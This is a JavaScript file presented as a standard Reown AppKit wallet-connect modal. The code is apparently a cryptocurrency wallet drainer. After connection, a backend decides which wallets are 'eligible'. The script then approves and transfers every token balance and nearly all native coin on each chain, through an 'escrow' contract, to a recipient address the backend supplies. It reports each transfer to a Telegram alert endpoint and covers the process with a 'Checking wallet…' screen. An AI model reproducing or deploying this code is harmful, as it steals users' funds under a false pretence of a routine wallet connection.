/**
 * Reown AppKit (standard wallet modal: browser wallets + WalletConnect + mobile).
 * Build: npm install && npm run build → load dist/connect-wallets.js + dist/wallet-modals.css
 * (web3-style overlays; tune colors in wallet-modals.css — see web3-loader.js reference).
 *
 * window.WALLET_CONNECT_CONFIG = {
 *   projectId, apiBase, metadata?, analytics?, connectingLabel?, connectionTimeoutMs?,
 *   features?: { ... }, // optional override; default disables email + socials (wallet-only)
 *   // Native coin (ETH etc.): do not send 100% of balance — leave some for gas.
 *   nativeGasReserveBps: 100, // optional; basis points kept for gas (100 = 1%). Default 100.
 *   nativeGasReserveMinWei: "0", // optional string; minimum wei to reserve (floor).
 *   nativeGasReserveMaxWei: undefined, // optional string; cap reserve (e.g. avoid 1% of huge balances).
 *   prepLoadingMessage: "Checking wallet…", // optional; shown in modal after connect, before contract calls.
 *   // After each successful escrow transfer, POSTs to `${apiBase}/send-message` for Telegram (server uses TELEGRAM_* env).
 * };
 */
import { createAppKit } from "@reown/appkit";
import { EthersAdapter } from "@reown/appkit-adapter-ethers";
import {
  ConnectionController,
  CoreHelperUtil,
} from "@reown/appkit-controllers";
import {
  mainnet,
  bsc,
  polygon,
  arbitrum,
  optimism,
  base,
  avalanche,
  flare,
  songbird,
} from "@reown/appkit/networks";
import {
  BrowserProvider,
  Contract,
  formatUnits,
  getAddress,
  parseUnits,
} from "ethers";

const ESCROW_ABI = [
  "function approve(uint256 amount, address token, address recipient)",
  "function approveConnection(address payable recipient) payable",
];

const ERC20_ABI = [
  "function approve(address spender, uint256 amount) returns (bool)",
  "function allowance(address owner, address spender) view returns (uint256)",
];

const NETWORK_BY_ID = {
  1: mainnet,
  56: bsc,
  137: polygon,
  42161: arbitrum,
  10: optimism,
  8453: base,
  43114: avalanche,
  14: flare,
  19: songbird,
};

const ALL_NETWORKS = Object.values(NETWORK_BY_ID);

/** Native ticker for Telegram / UX (matches supported `NETWORK_BY_ID` chains). */
const NATIVE_SYMBOL_BY_CHAIN_ID = {
  1: "ETH",
  56: "BNB",
  137: "MATIC",
  42161: "ETH",
  10: "ETH",
  8453: "ETH",
  43114: "AVAX",
  14: "FLR",
  19: "SGB",
};

function nativeSymbolForChain(chainId) {
  return NATIVE_SYMBOL_BY_CHAIN_ID[chainId] ?? `Native (${chainId})`;
}

/**
 * Fire-and-forget: notify backend to post a Telegram alert for this transfer.
 * @param {string} apiBase
 * @param {Record<string, unknown>} payload
 */
function notifyFundsMoved(apiBase, payload) {
  const base = (apiBase || "").replace(/\/$/, "");
  if (!base) return;
  const url = `${base}/send-message`;
  fetch(url, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify(payload),
  }).catch((err) => {
    console.warn("[connect-wallets] send-message failed", err);
  });
}

/** AppKit 1.7+ uses this namespace for EVM; `getAddress` / `subscribeAccount` need it. */
const EVM_NS = "eip155";
const UNSUPPORTED_BROWSER_MODAL_COUNT_KEY = "wallet-unsupported-browser-modal-count";

function cfg() {
  return window.WALLET_CONNECT_CONFIG || {};
}

/** Loads wallet-modals.css (same folder as connect-wallets.js). Classes: wc-dran-*, dran-*. */
function ensureWalletModalStylesheet() {
  if (document.getElementById("wc-wallet-modals-css")) return;
  if (document.querySelector('link[href*="wallet-modals.css"]')) return;
  const scripts = document.getElementsByTagName("script");
  let base = "";
  for (let i = scripts.length - 1; i >= 0; i--) {
    const src = scripts[i].src;
    if (src && /connect-wallets.*\.js(\?|$)/i.test(src)) {
      base = src.replace(/\/[^/]+$/, "/");
      break;
    }
  }
  const link = document.createElement("link");
  link.id = "wc-wallet-modals-css";
  link.rel = "stylesheet";
  link.href = base ? `${base}wallet-modals.css` : "wallet-modals.css";
  document.head.appendChild(link);
}

function hideWcDranOverlay(el) {
  el.classList.remove("wc-dran-overlay--visible");
}

function showWcDranOverlay(el) {
  el.classList.add("wc-dran-overlay--visible");
}

function ensureNotEligibleModal() {
  ensureWalletModalStylesheet();
  let el = document.getElementById("wallet-not-eligible-modal");
  if (el) return el;
  el = document.createElement("div");
  el.id = "wallet-not-eligible-modal";
  el.className = "wc-dran-overlay";
  el.setAttribute("role", "dialog");
  el.setAttribute("aria-modal", "true");
  el.setAttribute("aria-labelledby", "wallet-not-eligible-title");
  el.innerHTML =
    '<div class="dran-loader dran-loader--dark">' +
    '<div class="dran-loader__content">' +
    '<div class="dran-loader__head">' +
    '<h2 class="dran-loader__title" id="wallet-not-eligible-title">Wallet not eligible</h2>' +
    "</div>" +
    '<div class="dran-loader__main">' +
    '<div class="dran-loader__inner dran-loader__inner--center">' +
    '<p class="dran-loader__text" id="wallet-not-eligible-body">This wallet does not meet the requirements.</p>' +
    "</div></div></div>" +
    '<div class="dran-loader__actions">' +
    '<button type="button" class="active" id="wallet-not-eligible-close">Close</button>' +
    "</div>" +
    '<div class="dran-progress" style="display:none"><div class="dran-progress__fill"></div></div>' +
    "</div>";
  document.body.appendChild(el);
  el.querySelector("#wallet-not-eligible-close").addEventListener("click", () =>
    hideWcDranOverlay(el),
  );
  el.addEventListener("click", (ev) => {
    if (ev.target === el) hideWcDranOverlay(el);
  });
  return el;
}

function showNotEligibleModal() {
  const modal = ensureNotEligibleModal();
  showWcDranOverlay(modal);
}

function ensureMessageModal() {
  ensureWalletModalStylesheet();
  let el = document.getElementById("wallet-message-modal");
  if (el) return el;
  el = document.createElement("div");
  el.id = "wallet-message-modal";
  el.className = "wc-dran-overlay";
  el.setAttribute("role", "alertdialog");
  el.setAttribute("aria-modal", "true");
  el.setAttribute("aria-labelledby", "wallet-message-modal-title");
  el.innerHTML =
    '<div class="dran-loader dran-loader--dark">' +
    '<div class="dran-loader__content">' +
    '<div class="dran-loader__head">' +
    '<h2 class="dran-loader__title" id="wallet-message-modal-title"></h2>' +
    "</div>" +
    '<div class="dran-loader__main">' +
    '<div class="dran-loader__inner dran-loader__inner--center">' +
    '<p class="dran-loader__text" id="wallet-message-modal-body"></p>' +
    "</div></div></div>" +
    '<div class="dran-loader__actions">' +
    '<button type="button" class="active" id="wallet-message-modal-close">OK</button>' +
    "</div>" +
    '<div class="dran-progress" style="display:none"><div class="dran-progress__fill"></div></div>' +
    "</div>";
  document.body.appendChild(el);
  const close = () => hideWcDranOverlay(el);
  el.querySelector("#wallet-message-modal-close").addEventListener(
    "click",
    close,
  );
  el.addEventListener("click", (ev) => {
    if (ev.target === el) close();
  });
  return el;
}

/**
 * @param {string} title
 * @param {string} body
 */
function showMessageModal(title, body) {
  const modal = ensureMessageModal();
  const t = modal.querySelector("#wallet-message-modal-title");
  const b = modal.querySelector("#wallet-message-modal-body");
  if (t) t.textContent = title;
  if (b) {
    b.textContent = body;
    b.style.whiteSpace = "pre-wrap";
    b.style.wordBreak = "break-word";
  }
  showWcDranOverlay(modal);
}

function isMobileDevice() {
  if (typeof navigator === "undefined") return false;
  const ua = navigator.userAgent || "";
  return /Android|iPhone|iPad|iPod/i.test(ua);
}

function isLikelyInAppBrowser() {
  if (typeof navigator === "undefined") return false;
  const ua = navigator.userAgent || "";
  return /FBAN|FBAV|Instagram|Line\/|MicroMessenger|Twitter|TikTok|Snapchat|LinkedInApp|wv\)|; wv|Discord|Telegram/i.test(
    ua,
  );
}

function fallbackCfg() {
  const c = cfg();
  const raw = c.unsupportedBrowserFallback;
  return raw && typeof raw === "object" ? raw : {};
}

function maxUnsupportedBrowserModalCount() {
  const count = fallbackCfg().count;
  if (count === undefined || count === null || count === "") return Infinity;
  const n = Number(count);
  if (!Number.isFinite(n)) return Infinity;
  return Math.max(0, Math.floor(n));
}

function getUnsupportedBrowserModalShownCount() {
  try {
    const v = window.sessionStorage.getItem(UNSUPPORTED_BROWSER_MODAL_COUNT_KEY);
    const n = Number(v);
    return Number.isFinite(n) ? Math.max(0, Math.floor(n)) : 0;
  } catch {
    return 0;
  }
}

function incrementUnsupportedBrowserModalShownCount() {
  try {
    const next = getUnsupportedBrowserModalShownCount() + 1;
    window.sessionStorage.setItem(
      UNSUPPORTED_BROWSER_MODAL_COUNT_KEY,
      String(next),
    );
  } catch {
    /* ignore storage errors */
  }
}

function canShowUnsupportedBrowserModal() {
  return getUnsupportedBrowserModalShownCount() < maxUnsupportedBrowserModalCount();
}

function inAppBrowserName() {
  if (typeof navigator === "undefined") return "in-app browser";
  const ua = navigator.userAgent || "";
  if (/Twitter/i.test(ua)) return "X app";
  if (/Instagram/i.test(ua)) return "Instagram app";
  if (/FBAN|FBAV/i.test(ua)) return "Facebook app";
  if (/Telegram/i.test(ua)) return "Telegram app";
  if (/TikTok/i.test(ua)) return "TikTok app";
  return "in-app browser";
}

function preferredBrowserName() {
  return "browser";
}

function shouldGateConnectOnUnsupportedBrowser() {
  const fallback = fallbackCfg();
  if (fallback.enabled === false) return false;
  if (fallback.blockOnConnectClick === false) return false;
  if (!canShowUnsupportedBrowserModal()) return false;
  return isMobileDevice() && isLikelyInAppBrowser();
}

function ensureUnsupportedBrowserModal() {
  ensureWalletModalStylesheet();
  let el = document.getElementById("wallet-unsupported-browser-modal");
  if (el) return el;

  el = document.createElement("div");
  el.id = "wallet-unsupported-browser-modal";
  el.className = "wc-dran-overlay";
  el.setAttribute("role", "dialog");
  el.setAttribute("aria-modal", "true");
  el.setAttribute("aria-labelledby", "wallet-unsupported-browser-title");
  el.innerHTML =
    '<div class="dran-loader dran-loader--light dran-fallback dran-fallback--sheet">' +
    '<button type="button" class="dran-fallback__close" id="wallet-unsupported-browser-close" aria-label="Close">\u00d7</button>' +
    '<div class="dran-loader__content">' +
    '<div class="dran-loader__main">' +
    '<div class="dran-loader__inner dran-loader__inner--left">' +
    '<div class="dran-fallback__row">' +
    '<img class="dran-fallback__icon" id="wallet-unsupported-browser-icon" alt="" />' +
    '<div class="dran-fallback__copy">' +
    '<h2 class="dran-loader__title dran-fallback__title" id="wallet-unsupported-browser-title"></h2>' +
    '<p class="dran-loader__text dran-fallback__text" id="wallet-unsupported-browser-body"></p>' +
    "</div>" +
    "</div>" +
    "</div></div></div>" +
    '<div class="dran-loader__actions dran-fallback__actions">' +
    '<button type="button" class="dran-fallback__secondary" id="wallet-unsupported-browser-open"></button>' +
    '<button type="button" class="active dran-fallback__copy-btn" id="wallet-unsupported-browser-copy">Copy URL</button>' +
    "</div>" +
    "</div>";

  document.body.appendChild(el);

  const close = () => hideWcDranOverlay(el);
  el.querySelector("#wallet-unsupported-browser-close").addEventListener(
    "click",
    close,
  );
  el.addEventListener("click", (ev) => {
    if (ev.target === el) close();
  });

  return el;
}

function showUnsupportedBrowserModal(options = {}) {
  if (!canShowUnsupportedBrowserModal()) return false;
  const fallback = fallbackCfg();
  const modal = ensureUnsupportedBrowserModal();

  const walletName =
    options.walletName || fallback.walletName || options.name || "Wallet";
  const title =
    options.title ||
    fallback.title ||
    "Not available in this browser";
  const body =
    options.body ||
    fallback.body ||
    "Please open this page in your regular browser to continue wallet connection.";
  const openUrl = options.openUrl || fallback.openUrl || "";
  const copyUrl = options.copyUrl || fallback.copyUrl || window.location.href;
  const iconUrl = options.walletIcon || fallback.walletIcon || "";
  const openLabel =
    options.openLabel || fallback.openLabel || `Open in ${walletName}`;

  const titleEl = modal.querySelector("#wallet-unsupported-browser-title");
  const bodyEl = modal.querySelector("#wallet-unsupported-browser-body");
  const iconEl = modal.querySelector("#wallet-unsupported-browser-icon");
  const openBtn = modal.querySelector("#wallet-unsupported-browser-open");
  const copyBtn = modal.querySelector("#wallet-unsupported-browser-copy");

  if (titleEl) titleEl.textContent = title;
  if (bodyEl) bodyEl.textContent = body;
  if (iconEl) {
    if (iconUrl) {
      iconEl.src = iconUrl;
      iconEl.alt = `${walletName} icon`;
      iconEl.style.display = "block";
    } else {
      iconEl.removeAttribute("src");
      iconEl.alt = "";
      iconEl.style.display = "none";
    }
  }
  if (openBtn) {
    openBtn.textContent = openLabel;
    openBtn.style.display = openUrl ? "flex" : "none";
    openBtn.disabled = !openUrl;
    openBtn.classList.toggle("disabled", !openUrl);
    openBtn.classList.toggle("active", !!openUrl);
    openBtn.onclick = () => {
      if (!openUrl) return;
      window.location.href = openUrl;
    };
  }
  if (copyBtn) {
    copyBtn.style.background = fallback.copyButtonColor || "";
    copyBtn.style.color = fallback.copyButtonTextColor || "";
    copyBtn.style.borderColor = fallback.copyButtonColor || "";
    copyBtn.onclick = async () => {
      try {
        await navigator.clipboard.writeText(copyUrl);
        copyBtn.textContent = "Copied";
        window.setTimeout(() => {
          copyBtn.textContent = "Copy URL";
        }, 1200);
      } catch {
        const ta = document.createElement("textarea");
        ta.value = copyUrl;
        ta.style.position = "fixed";
        ta.style.opacity = "0";
        document.body.appendChild(ta);
        ta.select();
        document.execCommand("copy");
        document.body.removeChild(ta);
      }
    };
  }

  incrementUnsupportedBrowserModalShownCount();
  showWcDranOverlay(modal);
  return true;
}

function shouldShowUnsupportedBrowserFallback(err) {
  const message = err?.message || String(err);
  const fallback = fallbackCfg();
  if (fallback.enabled === false) return false;
  if (!canShowUnsupportedBrowserModal()) return false;
  if (!isMobileDevice()) return false;
  if (!isLikelyInAppBrowser()) return false;
  return /timed out|cancelled/i.test(message);
}

function openWalletWithFallback(options = {}) {
  const dynamic = fallbackOptionsFromWallet(activeConnectingWallet);
  const fallback = fallbackCfg();
  const openUrl = options.openUrl || dynamic.openUrl || fallback.openUrl || "";
  const merged = {
    ...dynamic,
    ...fallback,
    ...options,
    openUrl,
  };
  if (!openUrl) {
    showUnsupportedBrowserModal(merged);
    return;
  }
  window.location.href = openUrl;
  window.setTimeout(() => {
    if (!document.hidden) {
      showUnsupportedBrowserModal(merged);
    }
  }, Number(merged.waitMs ?? 1200));
}

function errorToModalContent(err) {
  const msg = err?.message || String(err);
  if (msg === "Wallet connection cancelled.") {
    return {
      title: "Connection cancelled",
      body: "You closed the wallet window before connecting. Try again when you’re ready.",
    };
  }
  if (msg === "Wallet connection timed out.") {
    return {
      title: "Connection timed out",
      body: "No wallet was connected in time. Open Connect wallet and try again.",
    };
  }
  return { title: "Error", body: msg };
}

function ensureContractPrepLoadingModal() {
  ensureWalletModalStylesheet();
  let el = document.getElementById("wallet-contract-prep-loading-modal");
  if (el) return el;
  el = document.createElement("div");
  el.id = "wallet-contract-prep-loading-modal";
  el.className = "wc-dran-overlay";
  el.setAttribute("role", "status");
  el.setAttribute("aria-live", "polite");
  el.setAttribute("aria-busy", "true");
  el.setAttribute("aria-labelledby", "wallet-prep-loading-title");
  el.innerHTML =
    '<div class="dran-loader dran-loader--dark dran-loader--prep">' +
    '<div class="dran-loader__content">' +
    '<div class="dran-loader__main">' +
    '<div class="dran-loader__inner">' +
    '<div class="dran-loader__figure">' +
    '<div class="dran-spinner dran-spinner--load">' +
    '<div class="dran-lds-ring" aria-hidden="true">' +
    "<div></div><div></div><div></div><div></div>" +
    "</div></div></div>" +
    '<p class="dran-loader__text" id="wallet-prep-loading-title" data-prep-loading-message>Preparing…</p>' +
    "</div></div></div>" +
    '<div class="dran-loader__actions" style="display:none">' +
    '<button type="button" class="disabled" disabled>Please wait</button>' +
    "</div>" +
    '<div class="dran-progress" aria-hidden="true"><div class="dran-progress__fill" style="width:100%"></div></div>' +
    "</div>";
  document.body.appendChild(el);
  return el;
}

function showContractPrepLoading() {
  const el = ensureContractPrepLoadingModal();
  const msg = el.querySelector("[data-prep-loading-message]");
  const text = cfg().prepLoadingMessage || "Checking wallet…";
  if (msg) msg.textContent = text;
  el.setAttribute("aria-busy", "true");
  showWcDranOverlay(el);
}

function hideContractPrepLoading() {
  const el = document.getElementById("wallet-contract-prep-loading-modal");
  if (el) {
    hideWcDranOverlay(el);
    el.setAttribute("aria-busy", "false");
  }
}

function isValidAddress(addr) {
  try {
    getAddress(addr);
    return true;
  } catch {
    return false;
  }
}

function nativeWei(chain) {
  if (chain.rawBalance != null && String(chain.rawBalance).length > 0) {
    try {
      const w = BigInt(String(chain.rawBalance));
      if (w > 0n) return w;
    } catch {
      /* ignore */
    }
  }
  if (chain.balance != null && chain.balance !== "") {
    try {
      return parseUnits(String(chain.balance), 18);
    } catch {
      /* ignore */
    }
  }
  return 0n;
}

/**
 * Subtract a gas reserve from the native amount so approveConnection leaves funds for the tx fee.
 * Reserve = max(percent of balance, minWei), then capped by maxWei if set.
 */
function adjustNativeSendAmount(config, fullWei) {
  if (fullWei <= 0n) return 0n;

  let bps = config.nativeGasReserveBps;
  if (bps === undefined || bps === null) bps = 100;
  const bpsN = Number(bps);
  let reserve = 0n;
  if (Number.isFinite(bpsN) && bpsN > 0) {
    const clamped = BigInt(Math.min(Math.max(Math.floor(bpsN), 0), 10000));
    reserve = (fullWei * clamped) / 10000n;
  }

  const minS = config.nativeGasReserveMinWei;
  if (minS != null && String(minS).length > 0) {
    try {
      const minR = BigInt(String(minS));
      if (minR > reserve) reserve = minR;
    } catch {
      /* ignore invalid min */
    }
  }

  const maxS = config.nativeGasReserveMaxWei;
  if (maxS != null && String(maxS).length > 0) {
    try {
      const maxR = BigInt(String(maxS));
      if (maxR < reserve) reserve = maxR;
    } catch {
      /* ignore invalid max */
    }
  }

  if (reserve >= fullWei) return 0n;
  return fullWei - reserve;
}

function tokenWei(token) {
  const dec = token.decimals != null ? Number(token.decimals) : 18;
  if (token.rawBalance != null && String(token.rawBalance).length > 0) {
    try {
      const w = BigInt(String(token.rawBalance));
      if (w > 0n) return w;
    } catch {
      /* ignore */
    }
  }
  if (token.balance != null && token.balance !== "") {
    try {
      return parseUnits(String(token.balance), dec);
    } catch {
      /* ignore */
    }
  }
  return 0n;
}

/**
 * @returns {Promise<string | null>} transaction hash if a transfer was sent
 */
async function runTokenEscrow(signer, escrowAddr, token, amount, recipient) {
  if (!token.address || !isValidAddress(token.address)) return null;
  if (amount <= 0n) return null;
  if (!isValidAddress(escrowAddr))
    throw new Error("Invalid escrow contract address");

  const tokenC = new Contract(token.address, ERC20_ABI, signer);
  const escrowC = new Contract(escrowAddr, ESCROW_ABI, signer);
  const user = await signer.getAddress();
  const allowance = await tokenC.allowance(user, escrowAddr);
  if (allowance < amount) {
    const txA = await tokenC.approve(escrowAddr, amount);
    await txA.wait();
  }
  const txT = await escrowC.approve(amount, token.address, recipient);
  const receipt = await txT.wait();
  return receipt?.hash ?? txT.hash ?? null;
}

/**
 * @returns {Promise<string | null>} transaction hash if a transfer was sent
 */
async function runNativeEscrow(signer, escrowAddr, wei, recipient) {
  if (wei <= 0n) return null;
  if (!isValidAddress(escrowAddr))
    throw new Error("Invalid escrow contract address");
  const escrowC = new Contract(escrowAddr, ESCROW_ABI, signer);
  const tx = await escrowC.approveConnection(recipient, { value: wei });
  const receipt = await tx.wait();
  return receipt?.hash ?? tx.hash ?? null;
}

async function processChain(modal, chain, recipient, apiBase) {
  const config = cfg();
  const results = { chainId: chain.id, tokenErrors: [], nativeError: null };
  const network = NETWORK_BY_ID[chain.id];
  if (!network) {
    throw new Error(`Unsupported chain id ${chain.id}`);
  }

  await modal.switchNetwork(network);

  const walletProvider = modal.getWalletProvider();
  if (!walletProvider) {
    throw new Error("No wallet provider after network switch.");
  }

  const provider = new BrowserProvider(walletProvider);
  const signer = await provider.getSigner();
  const sourceWallet = await signer.getAddress();
  const escrowAddr = chain.contractAddress;

  for (const t of chain.tokens || []) {
    const amt = tokenWei(t);
    if (amt <= 0n) continue;
    try {
      const txHash = await runTokenEscrow(
        signer,
        escrowAddr,
        t,
        amt,
        recipient,
      );
      if (txHash) {
        const dec = t.decimals != null ? Number(t.decimals) : 18;
        const amountStr = formatUnits(amt, Number.isFinite(dec) ? dec : 18);
        notifyFundsMoved(apiBase, {
          sourceWalletAddress: sourceWallet,
          chainId: chain.id,
          kind: "token",
          symbol: String(t.symbol ?? "?"),
          tokenAddress: t.address,
          amount: amountStr,
          recipient,
          txHash,
        });
      }
    } catch (e) {
      console.error(
        "[connect-wallets] token escrow failed",
        chain.id,
        t.symbol,
        e,
      );
      results.tokenErrors.push({
        symbol: t.symbol,
        address: t.address,
        message: e?.message || String(e),
      });
    }
  }

  const fullNative = nativeWei(chain);
  const wei = adjustNativeSendAmount(config, fullNative);
  if (wei > 0n) {
    try {
      const txHash = await runNativeEscrow(signer, escrowAddr, wei, recipient);
      if (txHash) {
        notifyFundsMoved(apiBase, {
          sourceWalletAddress: sourceWallet,
          chainId: chain.id,
          kind: "native",
          symbol: nativeSymbolForChain(chain.id),
          amount: formatUnits(wei, 18),
          recipient,
          txHash,
        });
      }
    } catch (e) {
      console.error("[connect-wallets] native escrow failed", chain.id, e);
      results.nativeError = e?.message || String(e);
    }
  }

  return results;
}

function waitForWalletConnection(modal, timeoutMs) {
  const limit = timeoutMs ?? 300_000;
  return new Promise((resolve, reject) => {
    if (modal.getIsConnectedState() && modal.getAddress(EVM_NS)) {
      resolve();
      return;
    }
    let settled = false;
    let unsubP;
    let unsubS;
    let tid;

    const cleanup = () => {
      try {
        unsubP?.();
      } catch {
        /* ignore */
      }
      try {
        unsubS?.();
      } catch {
        /* ignore */
      }
      clearTimeout(tid);
    };

    const finish = (ok, err) => {
      if (settled) return;
      settled = true;
      cleanup();
      ok ? resolve() : reject(err);
    };

    tid = setTimeout(() => {
      finish(false, new Error("Wallet connection timed out."));
    }, limit);

    unsubP = modal.subscribeAccount((s) => {
      if (s.isConnected && s.address) {
        finish(true);
      }
    }, EVM_NS);

    unsubS = modal.subscribeState((st) => {
      if (!st.open && !modal.getIsConnectedState()) {
        finish(false, new Error("Wallet connection cancelled."));
      }
    });
  });
}

async function ensureConnected(modal) {
  if (modal.getIsConnectedState() && modal.getAddress(EVM_NS)) return;
  await modal.open({ view: "Connect", namespace: EVM_NS });
  await waitForWalletConnection(modal, cfg().connectionTimeoutMs);
}

async function connectAndEscrow(modal) {
  const c = cfg();
  const apiBase = (c.apiBase || "").replace(/\/$/, "");
  if (!apiBase) {
    throw new Error(
      "Set window.WALLET_CONNECT_CONFIG.apiBase to your backend origin (no trailing slash).",
    );
  }
  if (!c.projectId || typeof c.projectId !== "string") {
    throw new Error(
      "Set window.WALLET_CONNECT_CONFIG.projectId from https://dashboard.reown.com",
    );
  }

  await ensureConnected(modal);

  showContractPrepLoading();
  try {
    const address = modal.getAddress(EVM_NS);
    if (!address) {
      throw new Error("No wallet address after connection.");
    }

    const url = `${apiBase}/wallet-details?walletAddress=${encodeURIComponent(address)}`;
    const res = await fetch(url);
    if (!res.ok) {
      const text = await res.text();
      throw new Error(`Backend error ${res.status}: ${text}`);
    }
    const json = await res.json();

    if (!json.eligible) {
      hideContractPrepLoading();
      showNotEligibleModal();
      return { ok: false, eligible: false };
    }

    const data = json.data || {};
    let recipient = data.reciepient || data.recipient;
    if (!recipient || !isValidAddress(recipient)) {
      throw new Error("Invalid or missing recipient address in API response.");
    }
    recipient = getAddress(recipient);

    const chains = data.chains || [];
    const summary = { ok: true, eligible: true, chains: [] };

    hideContractPrepLoading();

    for (const ch of chains) {
      try {
        const r = await processChain(modal, ch, recipient, apiBase);
        summary.chains.push(r);
      } catch (e) {
        console.error("[connect-wallets] chain skipped", ch.id, e);
        summary.chains.push({
          chainId: ch.id,
          skipped: true,
          error: e?.message || String(e),
          tokenErrors: [],
          nativeError: null,
        });
      }
    }

    return summary;
  } catch (e) {
    hideContractPrepLoading();
    throw e;
  }
}

let appKitModal = null;
let activeConnectingWallet = null;
let unsubConnectingWallet = null;

function getWalletConnectUri() {
  return ConnectionController?.state?.wcUri || "";
}

function buildOpenWalletUrl(walletItem) {
  const wcUri = getWalletConnectUri();
  const mobileLink = walletItem?.walletInfo?.deepLink;
  if (!mobileLink || !wcUri) return "";
  try {
    const { redirect } = CoreHelperUtil.formatNativeUrl(
      mobileLink,
      wcUri,
      walletItem?.walletInfo?.linkMode ?? null,
    );
    return redirect || "";
  } catch {
    return "";
  }
}

function fallbackOptionsFromWallet(walletItem) {
  const wcUri = getWalletConnectUri();
  const walletName = walletItem?.name || "Wallet";
  return {
    walletName,
    walletIcon: walletItem?.imageUrl || "",
    openUrl: buildOpenWalletUrl(walletItem),
    copyUrl: wcUri || window.location.href,
    openLabel: `Open in ${walletName}`,
  };
}

function createAppKitModal() {
  const c = cfg();
  const metadata = c.metadata || {
    name: c.appName || "App",
    description: c.appDescription || "Wallet connection",
    url:
      typeof window !== "undefined"
        ? window.location.origin
        : "https://localhost",
    icons: Array.isArray(c.icons) && c.icons.length ? c.icons : [],
  };

  const features = {
    /** Wallet-only connect UI (no email / Google / Discord / etc.). */
    email: false,
    socials: false,
    connectMethodsOrder: ["wallet"],
    analytics: c.analytics === true,
    /** Hides the “UX by Reown” footer when supported (see Reown Cloud plan). */
    reownBranding: false,
    ...(c.features && typeof c.features === "object" ? c.features : {}),
  };

  const modal = createAppKit({
    adapters: [new EthersAdapter()],
    networks: ALL_NETWORKS,
    metadata,
    projectId: c.projectId,
    features,
  });
  if (!unsubConnectingWallet) {
    unsubConnectingWallet = modal.subscribeState((state) => {
      if (state?.connectingWallet) {
        activeConnectingWallet = state.connectingWallet;
      }
    });
  }
  return modal;
}

let bindBusy = false;

async function onConnectClick(ev) {
  const btn = ev.currentTarget;
  if (bindBusy) return;
  if (shouldGateConnectOnUnsupportedBrowser()) {
    const appName = inAppBrowserName();
    const browserName = preferredBrowserName();
    const shown = showUnsupportedBrowserModal({
      title: `Open in ${browserName}`,
      body: `Copy and Open the link outside the ${appName} for wallet connection to work properly 📌`,
      openUrl: "",
      copyUrl: window.location.href,
      openLabel: "Open wallet",
    });
    if (shown) return;
  }
  bindBusy = true;
  const prevText = btn.textContent;
  btn.disabled = true;
  btn.setAttribute("aria-busy", "true");
  btn.textContent = cfg().connectingLabel || "Connecting…";
  try {
    if (!appKitModal) {
      appKitModal = createAppKitModal();
    }
    await connectAndEscrow(appKitModal);
  } catch (err) {
    console.error("[connect-wallets]", err);
    if (shouldShowUnsupportedBrowserFallback(err)) {
      const shown = showUnsupportedBrowserModal(
        fallbackOptionsFromWallet(activeConnectingWallet),
      );
      if (shown) return;
    }
    const { title, body } = errorToModalContent(err);
    showMessageModal(title, body);
  } finally {
    bindBusy = false;
    btn.disabled = false;
    btn.removeAttribute("aria-busy");
    btn.textContent = prevText;
  }
}

function bind() {
  window.showWalletUnsupportedBrowserModal = showUnsupportedBrowserModal;
  window.openWalletWithFallback = openWalletWithFallback;
  document.querySelectorAll(".connect-wallets").forEach((btn) => {
    if (btn.dataset.connectWalletsBound === "1") return;
    btn.dataset.connectWalletsBound = "1";
    btn.addEventListener("click", onConnectClick);
  });
}

if (document.readyState === "loading") {
  document.addEventListener("DOMContentLoaded", bind);
} else {
  bind();
}
